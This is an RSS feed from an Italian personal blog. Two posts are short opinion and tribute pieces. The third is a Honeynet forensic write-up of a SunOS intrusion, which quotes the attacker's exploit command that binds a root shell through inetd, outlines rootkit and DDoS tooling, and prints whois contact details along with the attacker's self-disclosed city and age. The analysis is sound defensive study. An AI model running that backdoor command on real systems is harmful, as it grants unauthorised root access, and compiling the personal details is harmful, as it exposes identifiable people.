<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>informatica | Memini.it</title>
	<atom:link href="https://www.memini.it/tag/informatica/feed/" rel="self" type="application/rss+xml" />
	<link>https://www.memini.it</link>
	<description>Mondo sensibile imperfetto, spazio ideale metafisico</description>
	<lastBuildDate>Tue, 11 Aug 2015 08:25:28 +0000</lastBuildDate>
	<language>it-IT</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.4</generator>
	<item>
		<title>Il futuro della sicurezza informatica?</title>
		<link>https://www.memini.it/il-futuro-della-sicurezza-informatica/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=il-futuro-della-sicurezza-informatica</link>
					<comments>https://www.memini.it/il-futuro-della-sicurezza-informatica/#respond</comments>
		
		<dc:creator><![CDATA[luca]]></dc:creator>
		<pubDate>Tue, 11 Aug 2015 08:22:54 +0000</pubDate>
				<category><![CDATA[Lavoratore]]></category>
		<category><![CDATA[nerd]]></category>
		<category><![CDATA[cybersec]]></category>
		<category><![CDATA[informatica]]></category>
		<category><![CDATA[pensieri]]></category>
		<category><![CDATA[sicurezza]]></category>
		<guid isPermaLink="false">http://www.memini.it/?p=2830</guid>

					<description><![CDATA[<p>&#160; In questi giorni mi domando quale sarÃ  il futuro del campo in cui lavoro, ovvero la sicurezza informatica, fino</p>
<p>The post <a href="https://www.memini.it/il-futuro-della-sicurezza-informatica/">Il futuro della sicurezza informatica?</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></description>
										<content:encoded><![CDATA[<p><img fetchpriority="high" decoding="async" class="aligncenter size-medium wp-image-2831" src="https://www.memini.it/wp-content/uploads/2015/08/sicurezza_informatica__quale_futuro__6380-400x225.jpg" alt="sicurezza_informatica__quale_futuro__6380" width="400" height="225" srcset="https://www.memini.it/wp-content/uploads/2015/08/sicurezza_informatica__quale_futuro__6380-400x225.jpg 400w, https://www.memini.it/wp-content/uploads/2015/08/sicurezza_informatica__quale_futuro__6380.jpg 599w" sizes="(max-width: 400px) 100vw, 400px" /></p>
<p>&nbsp;</p>
<p>In questi giorni mi domando quale sarÃ  il futuro del campo in cui lavoro, ovvero la sicurezza informatica, fino a non poco tempo fa si diceva che la cyberwar non esisteva o che l&#8217;<a href="https://en.wikipedia.org/wiki/Advanced_persistent_threat" target="_blank">APT</a> fosse inventato invece ora questa attivitÃ , reali, sembrano giÃ  vecchie.<br />
Personalmente credo che il mercato della sicurezza si dovrÃ  ampliare mostrusamente visto ormai come l&#8217;informatica venga applicata anche a realtÃ  che &#8220;informatiche&#8221; non erano; pensiamo allo scandalo della <a href="https://www.google.com/search?q=sicurezza+jeep+si+guida+da+remoto&amp;ie=utf-8&amp;oe=utf-8#safe=off&amp;q=sicurezza+informatica+jeep+cherokee+" target="_blank">jeep cherokee</a> uscito in questi giorni.<br />
In particolare quello che mi affascina di piÃ¹ sono tutte le future applicazioni nel campo della domatica; stiamo andando verso la casa iper-connessa ma con una livello di sicurezza non adeguato (almeno a mio parere) sopratutto visto quanto sarÃ  calata nella riservatezza o alla privacy tutta domestica.</p>
<p>Che sia ora di mandare il CV a BTicino? :-)</p><p>The post <a href="https://www.memini.it/il-futuro-della-sicurezza-informatica/">Il futuro della sicurezza informatica?</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.memini.it/il-futuro-della-sicurezza-informatica/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Addio Dennis e grazie per tutto il pesce</title>
		<link>https://www.memini.it/addio-dennis-e-grazie-per-tutto-il-pesce/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=addio-dennis-e-grazie-per-tutto-il-pesce</link>
					<comments>https://www.memini.it/addio-dennis-e-grazie-per-tutto-il-pesce/#respond</comments>
		
		<dc:creator><![CDATA[luca]]></dc:creator>
		<pubDate>Fri, 14 Oct 2011 10:25:07 +0000</pubDate>
				<category><![CDATA[nerd]]></category>
		<category><![CDATA[c]]></category>
		<category><![CDATA[Dennis Ritchie]]></category>
		<category><![CDATA[informatica]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[Mac Os X]]></category>
		<category><![CDATA[Unix]]></category>
		<category><![CDATA[windows]]></category>
		<guid isPermaLink="false">http://www.memini.it/?p=1977</guid>

					<description><![CDATA[<p>Articolo tratto da mal di tech (corriere.it) Addio Dennis e grazie per tutto il pesce Dennis Ritchie se nâ€™Ã¨ andato</p>
<p>The post <a href="https://www.memini.it/addio-dennis-e-grazie-per-tutto-il-pesce/">Addio Dennis e grazie per tutto il pesce</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></description>
										<content:encoded><![CDATA[<figure id="attachment_1978" aria-describedby="caption-attachment-1978" style="width: 148px" class="wp-caption aligncenter"><img decoding="async" class="size-full wp-image-1978" title="KERNIGHAN_linguaggioc0" src="https://www.memini.it/wp-content/uploads/2011/10/KERNIGHAN_linguaggioc0.gif" alt="" width="148" height="211" /><figcaption id="caption-attachment-1978" class="wp-caption-text">il K&amp;R</figcaption></figure>
<p>Articolo tratto da <a href="http://malditech.corriere.it/2011/10/14/addio-dennis-e-grazie-per-tutto-il-pesce/" target="_blank">mal di tech (corriere.it)</a></p>
<h2 id="titolo_articolo">Addio Dennis e grazie per tutto il pesce</h2>
<div>
<p><a href="http://en.wikipedia.org/wiki/Dennis_Ritchie" target="_blank">Dennis Ritchie</a> se nâ€<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" />Ã¨ andato 6 giorni fa (ma la notizia si Ã¨ diffusa in rete ieri). Senza grande clamore, se non fra gli addetti ai lavori. Il che Ã¨ comprensibile. Non era un venditore e i suoi gadget non sono entrati nelle case di miliardi di persone. Non guidava aziende quotate al Nasdaq. NÃ© faceva keynote ammaliando le folle.</p>
<p>Ma senza di lui non esisterebbero Linux, nÃ© Mac Os X. E neppure Windows. E parecchia altra roba. Di fatto Ritchie, una delle colonne dei <a name="&amp;lid=it.wikipedia.org/wiki/Bell_Laboratories&amp;lpos=homearticle-box = 1__link-position = 3" href="http://it.wikipedia.org/wiki/Bell_Laboratories" target="_blank"></a>Bell Labs, ha inventato â€“ con altri â€“ lâ€<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" />informatica moderna. Tra i â€œfigliâ€ di Ritchie câ€<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" />Ã¨ Unix, il primo sistema operativo che ha conquistato lâ€<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" />ambiente professionale (server, super-computer). Grazie Unix Ã¨ nato Linux. E piÃ¹ tardi anche Mac Os X.</p>
<p>Lâ€<img src="https://s.w.org/images/core/emoji/17.0.2/72x72/2122.png" alt="™" class="wp-smiley" style="height: 1em; max-height: 1em;" />altra creazione di Ritchie Ã¨ il linguaggio di programmazione <strong>C</strong>. Il cosiddetto <em>K&amp;R</em> (il titolo italiano Ã¨ <em>Il linguaggio C</em>) dai nomi degli autori (Brian) Kernighan e (Dennis) Ritchie, Ã¨ tuttora uno dei testi fondamentali per impadronirsi della materia. Â Una gran bella fetta del kernel (il â€œnoccioloâ€) di Windows NT e delle sue evoluzioni come Xp e Seven, Ã¨ stata scritta proprio in C. Il C ha figliato altri diffusissimi linguaggi come il C++ e Objective-C, che tanta importanza ha per le app di iOs. Insomma, senza Ritchie forse non giochereste neanche a <strong>Angry Birds</strong>. Pensateci mentre tirate giÃ¹ quei maledetti porcelli.</p>
</div><p>The post <a href="https://www.memini.it/addio-dennis-e-grazie-per-tutto-il-pesce/">Addio Dennis e grazie per tutto il pesce</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></content:encoded>
					
					<wfw:commentRss>https://www.memini.it/addio-dennis-e-grazie-per-tutto-il-pesce/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Incident Analysis</title>
		<link>https://www.memini.it/incident-analysis/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=incident-analysis</link>
					<comments>https://www.memini.it/incident-analysis/#respond</comments>
		
		<dc:creator><![CDATA[luca]]></dc:creator>
		<pubDate>Sat, 27 Feb 2010 13:11:48 +0000</pubDate>
				<category><![CDATA[nerd]]></category>
		<category><![CDATA[cracker]]></category>
		<category><![CDATA[informatica]]></category>
		<category><![CDATA[lamer]]></category>
		<category><![CDATA[security]]></category>
		<guid isPermaLink="false">http://www.memini.it/?p=1245</guid>

					<description><![CDATA[<p>Facendo ordine tra i miei documenti ho ritrovo questa analisi che avevo fatto con un amico per un contest su</p>
<p>The post <a href="https://www.memini.it/incident-analysis/">Incident Analysis</a> first appeared on <a href="https://www.memini.it">Memini.it</a>.</p>]]></description>
										<content:encoded><![CDATA[<p>Facendo ordine tra i miei documenti ho ritrovo questa analisi che avevo fatto con un amico per un contest su honeynet e mi Ã¨ venuta voglia di pubblicarla :)</p>
<p>&#8212;[ Getting start</p>
<p>To start analysis we&#8217;ve downloaded the log files day1.log.gz and<br />
day3.log.gz from http://project.honeynet.org/scans/scan28/ then<br />
we checked for their md5sum and finally we&#8217;ve decompressed them.</p>
<p>$ wget http://project.honeynet.org/scans/scan28/day1.log.gz<br />
&#8211;22:12:30&#8211;  http://project.honeynet.org/scans/scan28/day1.log.gz<br />
           => `day1.log.gz&#8217;<br />
Resolving project.honeynet.org&#8230; done.<br />
Connecting to project.honeynet.org[63.107.222.112]:80&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 2,885,991 [application/x-gzip]</p>
<p>100%[====================================>] 2,885,991      7.87K/s<br />
ETA 00:00</p>
<p>22:18:31 (7.87 KB/s) &#8211; `day1.log.gz&#8217; saved [2885991/2885991]</p>
<p>$ wget http://project.honeynet.org/scans/scan28/day3.log.gz<br />
&#8211;22:20:15&#8211;  http://project.honeynet.org/scans/scan28/day3.log.gz<br />
           => `day3.log.gz&#8217;<br />
Resolving project.honeynet.org&#8230; done.<br />
Connecting to project.honeynet.org[63.107.222.112]:80&#8230; connected.<br />
HTTP request sent, awaiting response&#8230; 200 OK<br />
Length: 3,474,770 [application/x-gzip]</p>
<p>100%[====================================>] 3,474,770     27.22K/s<br />
ETA 00:00</p>
<p>22:22:21 (27.22 KB/s) &#8211; `day3.log.gz&#8217; saved [3474770/3474770]</p>
<p>$ md5sum day1.log.gz<br />
79e5871791542c8f38dd9cee2b2bc317  day1.log.gz<br />
$ md5sum day3.log.gz<br />
af8ab95f41530fe3561b506b422ed636  day3.log.gz<br />
$ gzip -d day1.log.gz<br />
$ gzip -d day3.log.gz</p>
<p>&#8212;[ Honeypot&#8217;s OS</p>
<p>The operating system of honeypot is a SunOS, we can deduce it in<br />
some different ways. Many hints was given by attacker, infact he had<br />
downloaded from the network a series of tools for SunOS.<br />
We can clearly see some binaries like &#8220;solbnc&#8221; and &#8220;ipv6sun&#8221; by watching<br />
day1.log with ethereal.<br />
Another way to deduce was offered again by attacker who<br />
downloaded some patches for the system from sunsolve.<br />
The easiest way was another time given by attacker:</p>
<p>17:36:37.972605 61-219-90-180.HINET-IP.hinet.net.56712 ><br />
192.168.100.28.ingreslock: P 1:209(208) ack 1 win 5840<br />
<nop ,nop,timestamp 
48511171 11
3868611> (DF)<br />
0x0000   4500 0104 d486 4000 2c06 30c9 3ddb 5ab4        E&#8230;..@.,.0.=.Z.<br />
0x0010   c0a8 641c dd88 05f4 805b ec2e ba6d 43c2        ..d&#8230;&#8230;[&#8230;mC.<br />
0x0020   8018 16d0 104d 0000 0101 080a 02e4 38c3        &#8230;..M&#8230;&#8230;..8.<br />
0x0030   06c9 7f43 756e 616d 6520 2d61 3b6c 7320        &#8230;Cuname.-a;ls.<br />
0x0040   2d6c 202f 636f 7265 202f 7661 722f 6474        -l./core./var/dt<br />
0x0050   2f74 6d70 2f44 5453 5043 442e 6c6f 673b        /tmp/DTSPCD.log;<br />
0x0060   5041 5448 3d2f 7573 722f 6c6f 6361 6c2f        PATH=/usr/local/<br />
0x0070   6269 6e3a 2f75 7372 2f62 696e 3a2f 6269        bin:/usr/bin:/bi<br />
0x0080   6e3a 2f75 7372 2f73 6269 6e3a 2f73 6269        n:/usr/sbin:/sbi<br />
0x0090   6e3a 2f75 7372 2f63 6373 2f62 696e 3a2f        n:/usr/ccs/bin:/<br />
0x00a0   7573 722f 676e 752f 6269 6e3b 6578 706f        usr/gnu/bin;expo<br />
0x00b0   7274 2050 4154 483b 6563 686f 2022 4244        rt.PATH;echo.&#8221;BD<br />
0x00c0   2050 4944 2873 293a 2022 6070 7320 2d66        .PID(s):.&#8221;`ps.-f<br />
0x00d0   6564 7c67 7265 7020 2720 2d73 202f 746d        ed|grep.&#8217;.-s./tm<br />
0x00e0   702f 7827 7c67 7265 7020 2d76 2067 7265        p/x&#8217;|grep.-v.gre<br />
0x00f0   707c 6177 6b20 277b 7072 696e 7420 2432        p|awk.'{print.$2<br />
0x0100   7d27 600a                                      }&#8217;`.<br />
17:36:38.102597 192.168.100.28.ingreslock ><br />
61-219-90-180.HINET-IP.hinet.net.56712: P 3:167(164) ack 209 win 24616<br />
</nop><nop ,nop,timestamp 11386865
7 48511194> (DF)<br />
0x0000   4500 00d8 c8a3 4000 4006 28d8 c0a8 641c        E&#8230;..@.@.(&#8230;d.<br />
0x0010   3ddb 5ab4 05f4 dd88 ba6d 43c4 805b ecfe        =.Z&#8230;&#8230;mC..[..<br />
0x0020   8018 6028 cf9c 0000 0101 080a 06c9 7f71        ..`(&#8230;&#8230;&#8230;..q<br />
0x0030   02e4 38da 5375 6e4f 5320 7a6f 6265 7269        ..8.SunOS.zoberi<br />
0x0040   7573 2035 2e38 2047 656e 6572 6963 5f31        us.5.8.Generic_1<br />
0x0050   3038 3532 382d 3039 2073 756e 3475 2073        08528-09.sun4u.s<br />
0x0060   7061 7263 2053 554e 572c 556c 7472 612d        parc.SUNW,Ultra-<br />
0x0070   355f 3130 0a2f 636f 7265 3a20 4e6f 2073        5_10./core:.No.s<br />
0x0080   7563 6820 6669 6c65 206f 7220 6469 7265        uch.file.or.dire<br />
0x0090   6374 6f72 790a 2f76 6172 2f64 742f 746d        ctory./var/dt/tm<br />
0x00a0   702f 4454 5350 4344 2e6c 6f67 3a20 4e6f        p/DTSPCD.log:.No<br />
0x00b0   2073 7563 6820 6669 6c65 206f 7220 6469        .such.file.or.di<br />
0x00c0   7265 6374 6f72 790a 4244 2050 4944 2873        rectory.BD.PID(s<br />
0x00d0   293a 2031 3737 330a                            ):.1773.</p>
<p>we can clearly see the &#8220;uname -a&#8221; output: &#8220;SunOS zoberius 5.8<br />
Generic_108528-09 sun4u sparc SUNW,Ultra-5_10&#8221;</p>
<p>We used passive fingerprinting of the server&#8217;s packets by obtaining<br />
&#8220;SunOS 5.8 / 6&#8221; as result</p>
<p>Reassuming:</p>
<p>OPERATING SYSTEM    : SunOS zoberius 5.8 Generic_108528-09 sun4u sparc<br />
		      SUNW,Ultra-5_10</p>
<p>IP		    : 192.168.100.28 </p>
<p>&#8212;[ Break in</p>
<p>To break in the attacker has taken advantage of a vulnerability present<br />
in CDE (Common Desktop Environment), the default X Window System GUI<br />
environment of SunOS. Infact the CDE Subprocess Control Server daemon is<br />
vulnerable to a buffer overflow that can be exploited just sending a<br />
particular client request. Once exploited the attacker can execute<br />
arbitrary commands on the system with superuser privileges.<br />
The dtspcd is configured to run on port 6112/tcp, and a typical inetd<br />
configuration is the following:</p>
<p>dtspc stream tcp nowait root /usr/dt/bin/dtspcd /usr/dt/bin/dtspcd</p>
<p>In day1.log we can observe a series of connections at port 6122/tcp,<br />
probably that connections were the specially crafted CDE client request<br />
used to exploit the service, followed by an exchange of datas on<br />
the dtspc ports.</p>
<p>0000  08 00 20 d1 76 19 00 07  ec b2 d0 0a 08 00 45 00   .. .v&#8230; &#8230;&#8230;E.<br />
0010  00 3c 1b ca 40 00 2c 06  ea 4d 3d db 5a b4 c0 a8   .< ..@.,. .M=.Z...
0020  64 1c dc 4f 17 e0 80 39  28 15 00 00 00 00 a0 02   d..O...9 (.......
0030  16 d0 15 51 00 00 02 04  05 b4 04 02 08 0a 02 e4   ...Q.... ........
0040  33 df 00 00 00 00 01 03  03 00                     3....... ..      

0000  00 07 ec b2 d0 0a 08 00  20 d1 76 19 08 00 45 00   ........  .v...E.
0010  00 40 c8 93 40 00 40 06  29 80 c0 a8 64 1c 3d db   .@..@.@. )...d.=.
0020  5a b4 17 e0 dc 4f ba 39  4a 1e 80 39 28 16 b0 12   Z....O.9 J..9(...
0030  60 28 34 4b 00 00 01 01  08 0a 06 c9 7a 75 02 e4   `(4K.... ....zu..
0040  33 df 01 03 03 00 01 01  04 02 02 04 05 b4         3....... ......  

As supposed, in the stream we can see clearly the exploit at work and we 
can obtain some important information about the arbitrary executing code:

"ksh    -c  echo "ingreslock stream tcp nowait root /bin/sh sh 
-i">/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x&#8221;</p>
<p>0530  ff ec 82 10 20 0b 91 d0  20 08 2f 62 69 6e 2f 6b   &#8230;. &#8230;  ./bin/k<br />
0540  73 68 20 20 20 20 2d 63  20 20 65 63 68 6f 20 22   sh    -c   echo &#8221;<br />
0550  69 6e 67 72 65 73 6c 6f  63 6b 20 73 74 72 65 61   ingreslo ck strea<br />
0560  6d 20 74 63 70 20 6e 6f  77 61 69 74 20 72 6f 6f   m tcp no wait roo<br />
0570  74 20 2f 62 69 6e 2f 73  68 20 73 68 20 2d 69 22   t /bin/s h sh -i&#8221;<br />
0580  3e 2f 74 6d 70 2f 78 3b  2f 75 73 72 2f 73 62 69   >/tmp/x; /usr/sbi<br />
0590  6e 2f 69 6e 65 74 64 20  2d 73 20 2f 74 6d 70 2f   n/inetd  -s /tmp/<br />
05a0  78 3b 73 6c 65 65 70 20  31 30 3b 2f 62 69 6e 2f   x;sleep  10;/bin/<br />
05b0  72 6d 20 2d 66 20 2f 74  6d 70 2f 78 20 41 41 41   rm -f /t mp/x AAA</p>
<p>Thanks to that information we know that the attacker will use a remote<br />
root shell binded on ingreslock by inetd. </p>
<p>&#8212;[ ICMP &#8220;skillz&#8221;</p>
<p>During the analysis we have noticed a large amount of ICMP<br />
(echo reply) packets with &#8220;skillz&#8221; in data field.  </p>
<p>0000  00 07 ec b2 d0 0a 08 00  20 d1 76 19 08 00 45 00   &#8230;&#8230;..  .v&#8230;E.<br />
0010  04 14 40 5c 40 00 ff 01  87 f8 c0 a8 64 1c d9 74   ..@\@&#8230; &#8230;.d..t<br />
0020  26 0a 00 00 9c a3 1a 0a  00 00 00 00 00 00 00 00   &#038;&#8230;&#8230;. &#8230;&#8230;..<br />
0030  00 00 00 00 00 00 00 00  00 00 00 00 00 00 73 6b   &#8230;&#8230;.. &#8230;&#8230;sk<br />
0040  69 6c 6c 7a 00 00 00 00  00 00 00 00 00 00 00 00   illz&#8230;. &#8230;&#8230;..</p>
<p>The ICMP packets with &#8220;skillz&#8221; in them are used by Stacheldrath<br />
D-DoS tool. In order to manage the DoSNet these ICMP are exchanged<br />
among all the hosts linked in it.<br />
This tool works on Linux and Solaris machines and can be used to perform<br />
ICMP, SYN and UDP flood attacks moreover the attacker can specify<br />
attack&#8217;s duration and a range of ports for SYN flood.</p>
<p>&#8212;[ Sequences involved in the attack</p>
<p>The attack takes place in two days and follow these sequences:</p>
<p> [DAY 1]</p>
<p> &#8211; [1] Break in &#8211; The attacker gained a remote root shell by taking<br />
                  advantage of a vulnerability in dtspcd </p>
<p> &#8211; [2] Dummy hide &#8211; The attacker logged into the system thanks to the<br />
                    remote shell and created a home directory</p>
<p> &#8211; [3] Downloads &#8211; The attacker downloaded rootkit, utilities and patches<br />
                   from ftp and http sites </p>
<p> &#8211; [4] Rootkit &#8211; The attacker run a shell script for system patching<br />
                 and log cleaning. Log cleaning operations was done by<br />
                 erasing all the log files. The script had replaced<br />
                 also many unix utilities with trojaned versions</p>
<p> &#8211; [5] Backdoor &#8211; The attacker run a root backdoor using ssh</p>
<p> &#8211; [6] D-Dos &#8211; The attacker installed Stacheldrath client</p>
<p> &#8211; [7] Bouncer &#8211; The attacker installed an IRC bouncer and connected it to<br />
             irc.stealth.net </p>
<p> [DAY 3]</p>
<p> &#8211; [1] Chat &#8211; The attacker chatted with BNC placed on some channels<br />
              in ircnet due to IRC WAR actions</p>
<p> &#8211; [2] DOS &#8211; The attacker used the DoSNet against java.tiscalinet.it to<br />
             make a split for IRC WAR actions </p>
<p> &#8211; [3] SSH &#8211; The attacker made a connection using SSH and modified the<br />
       TCP/IP stack applying the IPv6 support  </p>
<p> &#8211; [4] Reboot &#8211; To make functional the IPv6 support the attacker rebooted<br />
                the system </p>
<p> &#8211; [5] IRC6 &#8211; The attacker made an ipv6 tunnel p-t-p and used the bnc<br />
              on irc6.edisontel.it  </p>
<p>&#8212;[ Martian Protocol</p>
<p>We don&#8217;t expect to found the IPv6 protocol over an IPv4 network, in<br />
this circumstance the IPv6 stack was enabled by the attacker, he used<br />
this protocol to make IRC connections using irc6.edisontel.it. The<br />
attacker is familiar to IRC WAR and used a BNC in IPv6 to make it less<br />
exposed to DOS. We&#8217;ve identified this protocol because after the system<br />
reboot we&#8217;ve noticed a series of ipv6 connections on irc6.edisontel.it  </p>
<p>01:13:04.225906 ts.ipv6.tilab.com > 192.168.100.28: irc6.edisontel.com.ircd ><br />
2001:6b8:0:400::5d0e.32780: S 2882472594:2882472594(0) ack 53523087 win 5760<br />
<mss 1440,nop,nop,sackOK><br />
0x0000   4500 0058 7f78 0000 0b29 31a0 a3a2 aaad        E..X.x&#8230;)1&#8230;..<br />
0x0010   c0a8 641c 6000 0000 001c 063b 2001 0750        ..d.`&#8230;&#8230;;&#8230;P<br />
0x0020   0002 0000 0202 a5ff fef0 aac7 2001 06b8        &#8230;&#8230;&#8230;&#8230;&#8230;.<br />
0x0030   0000 0400 0000 0000 0000 5d0e 1a0b 800c        &#8230;&#8230;&#8230;.]&#8230;..<br />
0x0040   abcf 0a92 0330 b28f 7012 1680 6596 0000        &#8230;..0..p&#8230;e&#8230;<br />
0x0050   0204 05a0 0101 0402                            &#8230;&#8230;..</p>
<p>03:44:24.121894 ts.ipv6.tilab.com > 192.168.100.28: irc6.edisontel.com.ircd ><br />
2001:6b8:0:400::5d0e.32780: P 43131:43181(50) ack 7377 win 5760<br />
0x0000   4500 0082 ef20 0000 0b29 c1cd a3a2 aaad        E&#8230;&#8230;..)&#8230;&#8230;<br />
0x0010   c0a8 641c 6000 0000 0046 063b 2001 0750        ..d.`&#8230;.F.;&#8230;P<br />
0x0020   0002 0000 0202 a5ff fef0 aac7 2001 06b8        &#8230;&#8230;&#8230;&#8230;&#8230;.<br />
0x0030   0000 0400 0000 0000 0000 5d0e 1a0b 800c        &#8230;&#8230;&#8230;.]&#8230;..<br />
0x0040   abcf b30d 0330 cf5f 5018 1680 84e8 0000        &#8230;..0._P&#8230;&#8230;.<br />
0x0050   3a60 4f77 6e5a 6060 217e 6168 6161 4062        :`OwnZ&#8220;!~ahaa@b<br />
0x0060   6163 6172 6469 2e6f 7261 6e67 652e 6f72        acardi.orange.or<br />
0x0070   672e 7275 204e 4943 4b20 3a62 6f62 7a60        g.ru.NICK.:bobz`<br />
0x0080   0d0a                                           ..</p>
<p>&#8212;[ System used</p>
<p>We have identified some different systems that have been involved in the<br />
attack. First of all we can identify the system used by the attacker to<br />
break into the honeynet. That system is a linux box (we check the<br />
operative system using the fingerprint) and its IP is 61.219.90.180 .<br />
Investigating on that ip we can obtain some information about his owner:</p>
<p>$ whois -h whois.twnic.net 61.219.90.180<br />
Su, Yi Chun<br />
   No.37-24, Yu Ying Rd.<br />
   Changhua County Taiwan<br />
   TW</p>
<p>   Netname: SU-YI-CHUN-NET<br />
   Netblock: 61.219.90.128 &#8211; 61.219.90.191</p>
<p>   Administrator contact:<br />
      Yi Chun Su (YCS65-TW) mis@taiwang.org<br />
      TEL: +886-9-23-289293</p>
<p>   Technical contact:<br />
      Yi Chun Su (YCS65-TW) mis@taiwang.org<br />
      TEL: +886-9-23-289293</p>
<p>$   </p>
<p>The result of fingerprint is: Linux 2.4.0 &#8211; Linux 2.4.18</p>
<p>The second system identified is that of the attacker, we can see his<br />
evidences only when he established the connection to the IRC BNC.<br />
The IP of the attacker is 80.117.14.222 and investigating on it we can<br />
find that his connection is an ADSL provided by telecom italia:</p>
<p>bash-2.05b$ whois 80.117.14.222<br />
% This is the RIPE Whois server.<br />
% The objects are in RPSL format.<br />
%<br />
% Rights restricted by copyright.<br />
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html</p>
<p>inetnum:      80.117.0.0 &#8211; 80.117.255.255<br />
netname:      TINIT-ADSL-LITE<br />
descr:        Telecom Italia<br />
descr:        Accesso ADSL BBB<br />
country:      IT<br />
admin-c:      BS104-RIPE<br />
tech-c:       BS104-RIPE<br />
status:       ASSIGNED PA<br />
remarks:      Please send abuse notification to<br />
abuse-bbb@telecomitalia.it<br />
notify:       ripe-staff@telecomitalia.it<br />
mnt-by:       TIWS-MNT<br />
changed:      net_ti@telecomitalia.it 20020905<br />
source:       RIPE</p>
<p>route:        80.117.0.0/16<br />
descr:        INTERBUSINESS<br />
origin:       AS3269<br />
notify:       network@cgi.interbusiness.it<br />
mnt-by:       INTERB-MNT<br />
changed:      net_ti@telecomitalia.it  20011210<br />
source:       RIPE</p>
<p>person:       BBBEASYIP STAFF<br />
address:      Via Val Cannuta, 250<br />
address:      I-00100 Roma<br />
address:      Italy<br />
phone:        +39 06 36881<br />
e-mail:       ripe-staff@telecomitalia.it<br />
nic-hdl:      BS104-RIPE<br />
notify:       ripe-staff@telecomitalia.it<br />
changed:      net_ti@telecomitalia.it 20001019<br />
source:       RIPE</p>
<p>The result of fingerprint on the attacker system is: Windows XP Pro<br />
The third system is the server used by attacker for rootkit and<br />
utilities download. The IP of that system is 62.211.66.16<br />
At the moment this IP is assigned to telecom italia net (TIN)<br />
but maybe when take place the attack that IP was assigned to XOOM<br />
free web hosting as we can see from the FTP banner:</p>
<p>FTP: 220 services FTP server (Version XOOM FTP 1.24.3+local-release<br />
Fri Aug 28 15:52:40 PDT 1998) ready.</p>
<p>The result of the fingerprint on the system is: FreeBSD 4.5 </p>
<p>The latest system obviously is the honeynet, once the attacker<br />
break in, used it to make IRC WAR and to make DoS over the<br />
net using Stacheldrath client. The honeynet system was linked to<br />
other two systems for D-DoS purposes:</p>
<p>61.134.3.11<br />
217.116.38.10</p>
<p>&#8212;[ Attacker Nationality</p>
<p>To identify the attacker nationality we have several ways. By watching the<br />
IP and analyzing the whois output we can understand that the attacker is<br />
italian because he used an adsl provided by Telecom Italia. This<br />
kind of adsl is for home use and there are low probabilities that the<br />
attacker spoofed his ip to connect to the BNC<br />
The confirmation of attacker nationality comes just from BNC log, infact<br />
he talking on irc (in italian) told the name of the city where he lives:</p>
<p>: |AnDr34z|!~OmBr4@vhost.irc6.server.tb.ngnet.it PRIVMSG #bobz :ma tu di<br />
dove sei ,)<br />
: |AnDr34z|!~OmBr4@vhost.irc6.server.tb.ngnet.it PRIVMSG #bobz :che non<br />
ho ancora capito<br />
:bobz`!~ahaa@irc6.vhost.la PRIVMSG #bobz : Salerno</p>
<p>	Il pacchetto e&#8217; questo:</p>
<p>18:40:34.118157 irc-1.stealth.net.5555 > 192.168.100.28.32805: P<br />
46566:46617(51) ack 6890 win 8192 (DF)<br />
0x0000   4500 005b 1b52 4000 3306 ec75 cefc c0c3        E..[.R@.3..u&#8230;.<br />
0x0010   c0a8 641c 15b3 8025 c7a5 b672 fdbf cf3e        ..d&#8230;.%&#8230;r&#8230;><br />
0x0020   5018 2000 ea48 0000 3a62 6f62 7a60 217e        P&#8230;.H..:bobz`!~<br />
0x0030   6168 6161 4069 7263 362e 7668 6f73 742e        ahaa@irc6.vhost.<br />
0x0040   6c61 2050 5249 564d 5347 2023 626f 627a        la.PRIVMSG.#bobz<br />
0x0050   203a 5361 6c65 726e 6f0d 0a                    .:Salerno..</p>
<p>The attacker says that is from Salerno and standing by his IP this is<br />
plausible. In another log the attacker reveal also his age</p>
<p>18:41:12.825540 irc-1.stealth.net.5555 > 192.168.100.28.32805: P<br />
47165:47214(49) ack 6979 win 8192 (DF)<br />
0x0000   4500 0059 9e63 4000 3306 6966 cefc c0c3        E..Y.c@.3.if&#8230;.<br />
0x0010   c0a8 641c 15b3 8025 c7a5 b8c9 fdbf cf97        ..d&#8230;.%&#8230;&#8230;..<br />
0x0020   5018 2000 79f8 0000 3a62 6f62 7a60 217e        P&#8230;y&#8230;:bobz`!~<br />
0x0030   6168 6161 4069 7263 362e 7668 6f73 742e        ahaa@irc6.vhost.<br />
0x0040   6c61 2050 5249 564d 5347 2023 626f 627a        la.PRIVMSG.#bobz<br />
0x0050   203a 616e 6e69 3f0d 0a                         .:anni?..</p>
<p>18:41:21.934924 irc-1.stealth.net.5555 > 192.168.100.28.32805: P<br />
47214:47289(75) ack 6979 win 8192 (DF)<br />
